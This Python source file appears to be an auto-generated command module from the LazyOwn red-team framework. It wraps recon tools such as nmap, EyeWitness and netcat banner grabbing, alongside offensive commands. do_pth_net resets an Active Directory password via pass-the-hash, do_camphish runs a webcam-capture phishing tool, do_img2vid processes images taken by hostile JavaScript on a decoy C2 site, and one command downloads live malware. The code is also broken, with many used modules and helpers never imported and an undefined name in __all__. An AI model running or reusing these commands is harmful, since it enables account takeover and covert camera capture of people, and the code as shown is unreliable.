"""report commands migrated from lazyown.py.

Auto-generated by scripts/migrate_lazyown.py.
"""
from __future__ import annotations

import cmd2

from cli.commands._base import LazyOwnCommandSet
from cli.commands._dormancy import PendingCommandSet
from utils import (
    print_msg, print_error, print_warn, print_succ,
    check_rhost, check_lhost, check_lport, check_port,
    GREEN, RED, BLUE, MAGENTA, CYAN, YELLOW, WHITE, RESET,
    UNDERLINE, BOLD,
)

class ReportMigratedCommandSet(PendingCommandSet):
    phase = "report"
    category = "reporting_category"

    def do_nmapscripthelp(self, line):
        """
        Provides help to find and display information about Nmap scripts.

        1. Checks if an argument is provided:
        - If no argument is given, displays an error message indicating the need to pass a script name.

        2. Executes a command to display script help:
        - Runs `nmap --script-help` with the provided argument (appending a wildcard `*` to match script names).
        - Prints a message with the command being executed and provides further instructions for using the Nmap script.

        3. Prints a message suggesting the next step:
        - Provides a suggestion for running Nmap with the appropriate script and options based on the search results.

        :param line: The script or keyword to search for in the Nmap script help output.
        :type line: str
        :returns: None

        Manual execution:
        To manually run these tasks, you would need to:
        - Run `nmap --script-help` with the specific script name or keyword.
        - Use the script names in Nmap commands to run scans with the desired scripts.

        Note: Ensure that `nmap` is installed and accessible in the system's PATH.
        """

        if not line:
            print_error("you must pass the script to find by argument.")
            return

        print_msg(f"Try... nmap --script-help '{line}*'{RESET}")
        self.cmd(f"nmap --script-help '{line}*'")
        print_msg(
            f"now you can run : {MAGENTA} sh sudo nmap -sCV -p <port> --script <script1,script2 <ip> {RESET}"
        )
        return

    def do_apropos(self, line):
        """
        Search for commands matching the given parameter in the cmd interface and optionally extend the search using the system's `apropos` command.

        :param line: The search term to find matching commands.

        :returns: None

        Manual execution:
        To manually search for commands matching a term using the `apropos` command, use the following command:

            apropos <search_term>

        Example:
            apropos network

        The `apropos` command will search for commands and documentation that match the given search term.

        The function also searches within the available commands in the cmd interface.
        """
        # Search within the cmd commands
        matched_cmds = [cmd for cmd in self.get_names() if line in cmd]

        if matched_cmds:
            print_msg("Commands found in the cmd interface:")
            for cmd in matched_cmds:
                print_msg(f"  {cmd.replace('do_','').replace('run_', 'run ')}")
        else:
            print_warn("No matching commands found in the cmd interface.")

        # Ask if the user wants to extend the search using the system's apropos command
        extend_search = input(
            f"    {YELLOW}[?] {WHITE}Do you want to extend the search using the system's {GREEN}`apropos`{WHITE} command? {MAGENTA}(y/n): {RESET}"
        )

        if extend_search.lower() == "y":
            print_msg(f"Searching for '{line}' using `apropos`...")
            self.cmd(f"apropos {line}")
        return

    def do_morse(self,line):
        """Interactive Morse Code Converter.

        This function serves as an interface for converting text to Morse code and vice versa.
        It provides a menu with the following options:

        1️⃣  Convert text to Morse code.
        2️⃣  Convert Morse code to text.
        0️⃣  Exit the program.

        When the function is called, it runs an external script (`morse.py`) that handles
        the conversion processes. The function also manages keyboard interruptions
        gracefully, allowing the user to exit the program cleanly.

        Arguments:
        line (str): This argument is reserved for future enhancements but is currently not used.

        Returns:
        None

        Notes:
        - Ensure that the `morse.py` module is located in the `modules` directory and is executable.
        - The function captures `KeyboardInterrupt` to allow safe exit from the Morse code converter.

        Example:
        >>> do_morse("")

        See Also:
        - `morse.py`: The script that contains the logic for Morse code conversions.
        """
        try:
            self.cmd("python3 modules/morse.py")
        except KeyboardInterrupt:
            print_warn("Exiting...")

    def do_download_malwarebazar(self, line):
        """Download a malware sample from MalwareBazaar using its SHA256 hash.

        This function allows the user to download a malware sample from MalwareBazaar by providing
        the SHA256 hash of the desired file. If the hash is not provided as an argument, the function
        will prompt an error message indicating the correct usage. The downloaded malware sample
        will be saved as a zipped file (`malware.zip`) and will be password protected.

        Arguments:
        line (str): The SHA256 hash of the malware sample to be downloaded.

        Returns:
        None

        Example:
        >>> download_malwarebazar 094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d

        Notes:
        - Ensure that the SHA256 hash provided is correct and that it corresponds to a file available
        on MalwareBazaar.
        - The downloaded file will be password protected using the password "infected".
        - To obtain the SHA256 hash of malware samples, refer to the `help malwarebazar` command.

        See Also:
        - `run(command)`: Utility function used to execute the command for downloading the malware.
        """
        if not line:
            print_error(f"You need pass the hash of malware as an argument example {GREEN}download_malwarebazar 094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d {BLUE} To get hash of malware see {GREEN}help malwarebazar")
            return
        file = "sessions/malware.zip"
        command = f'curl -X POST -d "query=get_file&sha256_hash={line}" -o {file} https://mb-api.abuse.ch/api/v1/'
        run(command)
        print_msg('Please note that any malware sample you download from MalwareBazaar will be zipped (malware.zip) and password protected using the password "infected" (without "").')
        out = run(f"file {file}")
        print_msg(out)
        return

    def do_createjsonmachine(self, line):
        """
        Create a new JSON payload file based on the template provided in payload.json.

        This function reads an existing JSON file named 'payload.json' and
        allows the user to update specific fields. The following fields can
        be modified:

        - 'url': The new URL to connect to, which can be entered manually
        or automatically generated based on the input parameter 'line'.
        - 'domain': The new domain associated with the URL, similarly
        generated or entered.
        - 'rhost': The new remote host IP address that needs to be specified
        by the user.

        All other fields from the original payload are preserved in the new
        JSON file, ensuring that no other data is lost or altered.

        The newly created JSON payload will be saved in a new file with the
        format 'payload_<new_name>.json', where <new_name> is derived
        from the domain name's subpart.

        Parameters:
        line (str): An optional string parameter that, if provided, is used
                    to generate the new 'url' and 'domain'. If empty,
                    the user will be prompted to enter values for 'url'
                    and 'domain'.

        Returns:
        None
        """
        old_domain = get_domain(self.params['url'])
        try:
            with open('payload.json', 'r') as file:
                data = json.load(file)
        except FileNotFoundError:
            print_error("Error: payload.json not found")
            return

        if not line:
            new_url = input("    [!] Enter new value to 'url': ")
            new_domain = input("    [!] Enter new value to 'domain': ")
        else:
            new_url = f"http://{line}.htb"
            new_domain = f"{line}.local"

        new_ip = input("    [!] Enter new value to 'rhost': ")
        if not new_ip:
            print_error("You need to provide a new rhost")
            return
        if not new_url:
            print_error("you need pass new_url")
            return
        if not new_domain:
            print_error("you need pass new_domain")
            return
        data['url'] = new_url
        data['domain'] = new_domain
        data['rhost'] = new_ip

        new_name = new_domain.split(".")[0]
        self.cmd(f"mv payload.json payload_{old_domain}.json")
        new_filename = f"payload_{new_name}.json"

        with open(new_filename, 'w') as outfile:
            json.dump(data, outfile, indent=4)
        self.cmd(f"cp {new_filename} payload.json")
        print_msg(f"Updated file saved as {new_filename}")
        self.onecmd("p")
        return

    def do_createjsonmachine_batch(self, line):
        """
        Create multiple JSON payload files based on a CSV input file from HackerOne.

        This function processes a CSV file located in the 'sessions' directory. The CSV file
        must contain information about different assets, including 'identifier',
        'eligible_for_bounty', and 'eligible_for_submission'. For each asset where
        both 'eligible_for_bounty' and 'eligible_for_submission' are set to True,
        a JSON payload file is created using a predefined template.

        The CSV must contain the following columns:
        - 'identifier': Domain or asset name used to generate the URL and domain for the payload.
        - 'eligible_for_bounty': A boolean indicating if the asset is eligible for bounty.
        - 'eligible_for_submission': A boolean indicating if the asset is eligible for submission.

        For each eligible asset:
        - The URL is generated based on the 'identifier' field.
        - The domain is derived from the 'identifier' field.
        - The 'rhost' field in the JSON payload is updated using the IP address obtained by pinging the domain.

        The JSON payload is saved in the format 'payload_<identifier>.json'.

        Parameters:
        line (str): An optional string parameter. If provided, it selects the corresponding CSV file
                    in the 'sessions' directory based on the user's input.

        Returns:
        None
        """
        sessions_dir = 'sessions'
        csv_files = [f for f in os.listdir(sessions_dir) if f.endswith('.csv')]

        if not csv_files:
            print_error("No CSV files found in the 'sessions' directory.")
            return

        print_msg("Available CSV files:")
        for idx, file in enumerate(csv_files):
            print_msg(f"{idx}: {file}")

        try:
            csv_index = int(input(f"    {GREEN}[!]{CYAN} Select the CSV file number to use: {RESET}"))
            csv_file = csv_files[csv_index]
        except (IndexError, ValueError):
            print_error("Invalid selection.")
            return

        csv_path = os.path.join(sessions_dir, csv_file)

        try:
            with open(csv_path, mode='r') as file:
                reader = csv.DictReader(file)
                for row in reader:
                    identifier = row['identifier'].replace("*.","")
                    eligible_for_bounty = row['eligible_for_bounty'].lower() == 'true'
                    eligible_for_submission = row['eligible_for_submission'].lower() == 'true'

                    if eligible_for_bounty and eligible_for_submission:
                        try:
                            ping_result = subprocess.run(['ping', '-c', '1', identifier], capture_output=True, text=True)
                            if ping_result.returncode != 0:
                                print_error(f"Failed to ping {identifier}. Skipping.")
                                continue
                            ip_address = ping_result.stdout.split()[2].strip('()')

                            with open('payload.json', 'r') as payload_file:
                                data = json.load(payload_file)

                            new_url = f"http://{identifier}"
                            new_domain = identifier
                            data['url'] = new_url
                            data['domain'] = new_domain
                            data['rhost'] = ip_address

                            new_filename = f"payload_{identifier.replace('.', '_')}.json"
                            with open(new_filename, 'w') as outfile:
                                json.dump(data, outfile, indent=4)

                            print_msg(f"Created payload for {identifier}: {new_filename}")

                        except Exception as e:
                            print_error(f"Error processing {identifier}: {str(e)}")
        except FileNotFoundError:
            print_error(f"CSV file not found: {csv_path}")
            return

    def do_name_the_hash(self, line):
        """Identify hash type using nth after retrieving it with get_hash().

        :param line: Line input for any additional parameters.

        :returns: None

        Manual execution:
        To manually identify the hash, use the following command:

            nth -t "{hash}"

        This function fetches the hash using get_hash() and identifies its type. If nth is not installed, it is automatically installed.
        """
        if not is_binary_present("nth"):
            print_warn("nth is not installed. Installing.")
            self.cmd("pip3 install nth")
            return

        hash_file_path = 'sessions/hash.txt'

        if not os.path.exists(hash_file_path):
            print_error(f"Hash not found. To create a hash use:{GREEN} createhash {RESET}")
            return

        hash_value = get_hash()
        command = f"nth -t \"{hash_value}\""

        print_msg(f"Executing command: {command}")
        self.cmd(command)

        return

    def do_extract_ports(self, line):
        """
        Extracts open ports and IP address information from a specified file.

        This function performs the following actions:
        1. Reads the specified file to find open ports.
        2. If not port pass as an argument, Extracts the first unique IP address found in the file.
        3. Prints the extracted information to the console.

        Parameters:
        line (str): The port to get information.

        Returns:
        None
        """
        path = os.getcwd()

        file = f"{path}/puertos"
        if not os.path.isfile(file):
            print_error(f"File not found: {file}")
            return

        if line:
            ports = line.strip()
        else:
            ports = ','.join(
                re.findall(r'(\d{1,5})/open', open(file).read())
            )

        ip_address = sorted(
            set(re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', open(file).read()))
        )[0] if re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', open(file).read()) else "Not found"

        print_msg("Extracting info...")
        print_msg(f"IP Address: {ip_address}")
        print_msg(f"Open Ports: {ports}")
        print_warn("To enter use Ctrl + Clic: ")
        print_msg(f"{BLUE}{UNDERLINE}https://www.speedguide.net/ip/{ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://otx.alienvault.com/browse/global/indicators?include_inactive=0&sort=-modified&page=1&limit=10&indicatorsSearch={ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://viz.greynoise.io/ip/{ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://search.censys.io/hosts/{ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://talosintelligence.com/reputation_center/lookup?search={ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://www.abuseipdb.com/check/{ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://whatismyipaddress.com/ip/{ip_address}")
        print_msg(f"{BLUE}{UNDERLINE}https://ping.pe/{ip_address}")
        self.cmd(f"curl https://internetdb.shodan.io/{ip_address}")
        self.onecmd(f"ipinfo {ip_address}")
        for p in ports.split(","):
            print_msg(f"{BLUE}{UNDERLINE}https://www.speedguide.net/port.php?port={p}")
            telnet = f"telnet {ip_address} {p}"
            nc = f"nc -n  {ip_address} {p}"
            openssl = f"openssl s_client -connect  {ip_address}:{p}"
            print_msg(telnet)
            self.cmd(telnet)
            print_msg(nc)
            self.cmd(nc)
            print_msg(openssl)
            self.cmd(openssl)
            banner = get_banner(ip_address, p)
            if banner and banner not in ("No banner received (timed out)", "Connection reset by peer - no banner available"):
                print_msg(banner)
                self.onecmd(f"ss {banner}")
            else:
                print_warn(f"Port: {p} return: {banner}")
        return

    def do_pth_net(self, line):
        """
        Executes the Pass-the-Hash (PTH) Net tool to change the password of an Active Directory account.

        This function performs the following actions:
        1. Prompts the user for necessary parameters if not provided.
        2. Executes the command to change the password for the specified account using Pass-the-Hash authentication.

        The command accepts the following parameters:
        - Target account for which the password will be changed.
        - New password to be set for the account.
        - Domain credentials for authentication.
        - DC IP address for the self.params['domain'] controller.
        - NTLM hash for Pass-the-Hash authentication.

        Parameters:
        line (str): Command argument specifying the target account and new password options.
                    Expected format:
                        - ACCOUNT for the target account (default: ca_operator)
                        - NEW_PASSWORD for the new password (default: newP@ssword2022)
                        - Required flags for authentication and connection

        Returns:
        None
        """
        target_account = input("    [!] Enter the target account (default: ca_operator): ") or 'ca_operator'
        new_password = input("    [!] Enter the new password (default: newP@ssword2022): ") or 'newP@ssword2022'
        domain = self.params['domain']
        hash_value = input("    [!] Enter the NTLM hash for Pass-the-Hash authentication: ")
        rhost = self.params['rhost']

        command = f"pth-net rpc password \"{target_account}\" \"{new_password}\" -U \"{self.params['domain']}/management_svc%{hash_value}\" -S \"{self.params['rhost']}\""
        print_msg(command)
        self.cmd(command)
        return

    def do_eyewitness_py(self, line):
        """
        Automates EyeWitness installation and execution without requiring user input.

        This function installs EyeWitness if it is not already available, uses a default input file
        (`urls.txt`), and applies standard configurations to execute a web enumeration task
        automatically. No arguments or manual intervention are needed from the user.

        Behavior:
            - Installs EyeWitness if missing.
            - Uses `urls.txt` as the default input file.
            - Sets a default timeout of 60 seconds.
            - Automatically executes EyeWitness with predefined settings.

        Usage:
            witness
        """
        try:
            path = os.getcwd()
            eyewitness_repo = "https://github.com/FortyNorthSecurity/EyeWitness.git"
            eyewitness_path = os.path.join("external", ".exploit", "EyeWitness")
            eyewitness_path = path + "/" + eyewitness_path
            default_timeout = 60
            path = os.getcwd()
            domain = self.params['domain']
            if not os.path.exists(eyewitness_path):
                print_warn("EyeWitness not found. Installing...")
                os.makedirs(eyewitness_path, exist_ok=True)
                self.cmd(f"git clone {eyewitness_repo} {eyewitness_path}")
                self.cmd(f"cd {eyewitness_path}/Python/setup && sudo ./setup.sh && pip3 install selenium && pip3 install pyvirtualdisplay")
                print_msg("EyeWitness installed successfully.")

            input_file = get_users_dic("txt")

            if input_file is None:
                input_file = f"{path}/sessions/domain_{self.params['domain']}.txt"
                command = f"echo \"{self.params['domain']}\" > {input_file}"
                print_msg("Crafting file self.params['domain']: " + command)
                self.cmd(command)

            command = f"cd {eyewitness_path}/Python && python3 {eyewitness_path}/Python/EyeWitness.py -f {input_file} --web --timeout {default_timeout}"
            print_msg(f"Executing EyeWitness with command: {command}")
            self.cmd(command)
            self.logcsv(f"eyewitness_py {command}")
        except Exception as e:
            print_error(f"Error: {e}")

    def do_pup(self, line):
        """
        Processes HTML content from a specified URL using the pup utility and a default CSS selector.

        This function:
            - Retrieves HTML content from the URL stored in `self.params['url']` using curl.
            - Filters the HTML content using the pup utility with a predefined CSS selector.
            - Displays the filtered result in the terminal.

        Behavior:
            - Requires `pup` to be installed.
            - Uses `self.params['url']` as the source URL.
            - Applies the CSS selector 'table table tr:nth-last-of-type(n+2) td.title a' by default.

        Usage:
            pup
        """
        path = os.getcwd()
        pup_repo = "https://github.com/ericchiang/pup.git"
        pup_path = os.path.join("external", ".exploit", "pup")
        pup_path = path + "/" + pup_path
        try:
            if not is_binary_present("pup"):
                print_error("pup is not installed. Installing ''")
                print_msg(pup_repo)
                self.cmd(f"git clone {pup_repo} {pup_path}")
                command = f"cd {pup_path} && go get github.com/ericchiang/pup && go build && go install"
                print_msg(command)
                self.cmd(command)


            url = self.params.get("url")
            if not url:
                print_error("URL not defined in self.params['url']. use assing url http://url.com")
                url = input("    [!] Enter the url to pup: ")

            default_selector = "table table tr:nth-last-of-type(n+2) td.title a"
            default_selector = input(f"    [!] Enter the default selector {default_selector}: ") or default_selector
            command = f"curl -s {url} | pup '{default_selector}'"
            print_msg(f"Executing: {command}")
            self.cmd(command)
            self.logcsv(f"pup {command}")
        except Exception as e:
            print_error(f"Error: {e}")
        return

    def do_c2asm(self, arg):
        """
        Display C and ASM code side by side in a curses-based interface.

        This function sets up a curses window to display C code and its corresponding
        assembly code side by side. It allows the user to select a .c file from the
        'sessions' directory and then displays the code with scrolling capabilities
        both vertically and horizontally. A green vertical line separates the C code
        from the ASM code.

        Parameters:
            stdscr (curses.window): The curses window object to draw on.

        Returns:
            None
        """
        curses.wrapper(self.view_code)

    def do_camphish(self, line):
        """
        Executes the camphish tool for Grab cam shots from target's phone front camera or PC webcam just sending a link.

        This function:
            - Installs camphish if not already installed.
            - Executes the camphish command with the provided parameters.
            - Displays the result in the terminal.

        Behavior:
            - Requires `git` and `php` to be installed.
            - Uses a one-liner installation method for simplicity.

        Usage:
            camphish
        """
        path = os.getcwd()
        camphish_repo = "https://github.com/techchipnet/CamPhish.git"
        camphish_path = os.path.join(path, "external", ".exploit", "CamPhish")

        try:
            if not os.path.exists(camphish_path):
                print_msg("CamPhish is not installed. Installing...")
                self.cmd(f"git clone {camphish_repo} {camphish_path}")
                self.cmd(f"cd {camphish_path} && chmod +x camphish.sh")

            command = f"cd {camphish_path} && ./camphish.sh"
            self.cmd(command)

        except Exception as e:
            print_error(f"An error occurred: {e}")

    def do_get_avaible_actions(self, line):
        """Get list de supported acctions."""
        actions = self.get_available_actions()
        print_msg(actions)

    def do_img2vid(self, line):
        """
        Generates an MP4 video from PNG images found in the sessions/captured_images directory.
        This images are generated by the ofensive js code in the decoy site (When the blueteam try to visit our c2 and success login).

        The images are expected to have filenames in the format: capture_YYYYMMDD_HHMMSS.png.
        The video will be created in the current working directory as 'output.mp4'.
        Requires ffmpeg to be installed and accessible in the system's PATH.
        """
        if not os.path.isdir(self.captured_images_dir):
            print_error(f"Error: Directory not found: {self.captured_images_dir}")
            return

        image_files = sorted(glob.glob(os.path.join(self.captured_images_dir, 'capture_*.png')))

        if not image_files:
            print_error("No PNG images found in the captured images directory.")
            return

        num_images = len(image_files)
        frame_rate = 1
        duration = num_images / frame_rate
        fade_out_start = max(0, duration - 1)

        try:
            ffmpeg_cmd = [
                'ffmpeg',
                '-framerate', str(frame_rate),
                '-pattern_type', 'glob',
                '-i', os.path.join(self.captured_images_dir, 'capture_*.png'),
                '-vf', f'fade=in:st=0:d=1,fade=out:st={fade_out_start}:d=1',
                '-r', '30', # Output frame rate
                '-c:v', 'libx264',
                '-pix_fmt', 'yuv420p',
                '-y',  # Overwrite output file if it exists
                self.captured_images_dir + '/output.mp4'
            ]
            subprocess.run(ffmpeg_cmd, check=True, capture_output=True)
            print_msg("Video "+ self.captured_images_dir + '/output.mp4' + " created successfully.")
        except FileNotFoundError:
            print_error("Error: ffmpeg command not found. Please ensure it is installed and in your system's PATH.")
        except subprocess.CalledProcessError as e:
            print_error(f"Error creating video: {e}")
            print_error(f"FFmpeg output (stderr):\n{e.stderr.decode()}")
        except Exception as e:
            print_error(f"An unexpected error occurred: {e}")

    def do_process_scans(self, line):
        """
        Processes CSV files with scan results and vulnerability data to generate a Shodan-like JSON database.

        Args:
            arg (Namespace): Arguments parsed by cmd2. Includes:
                directory (str, positional): The directory containing the CSV files.

        Returns:
            None

        Output:
            A JSON file named 'surface_attack.json' in the specified directory containing the processed data.
        """

        all_data = {
            "hosts": [],
            "services": [],
            "vulnerabilities": [],

        }
        processed_ips = set()


        scan_files = glob.glob(os.path.join(self.sessions_dir, "scan_*.csv"))
        for scan_file in scan_files:
            match = re.match(r"scan_([^_]+)_(\d+).csv", os.path.basename(scan_file))
            if match:
                ip = match.group(1)
                port = int(match.group(2))
                self.process_scan_csv(scan_file, ip, port, all_data, processed_ips)
            elif match := re.match(r"scan_([^_]+)\.csv", os.path.basename(scan_file)):
                ip = match.group(1)
                self.process_scan_csv(scan_file, ip, None, all_data, processed_ips)
            elif match := re.match(r"scan_discovery_([^_]+)_(\d+)\.csv", os.path.basename(scan_file)):
                ip = match.group(1)
                port = int(match.group(2))
                self.process_scan_csv(scan_file, ip, port, all_data, processed_ips)
            elif match := re.match(r"scan_discovery_([^_]+)\.csv", os.path.basename(scan_file)):
                ip = match.group(1)
                self.process_scan_csv(scan_file, ip, None, all_data, processed_ips)


        vuln_files = glob.glob(os.path.join(self.sessions_dir, "vulns_*.csv"))
        for vuln_file in vuln_files:
            match = re.match(r"vulns_([^_]+).csv", os.path.basename(vuln_file))
            if match:
                ip = match.group(1)
                self.process_vuln_csv(vuln_file, ip, all_data, processed_ips)

        output_file = os.path.join(self.sessions_dir, "surface_attack.json")
        with open(output_file, 'w') as f:
            json.dump(all_data, f, indent=2)
        print_msg(f"Processed CSV files and saved data to '{output_file}'.")

__all__ = [f"{phase.title()}CommandSet"]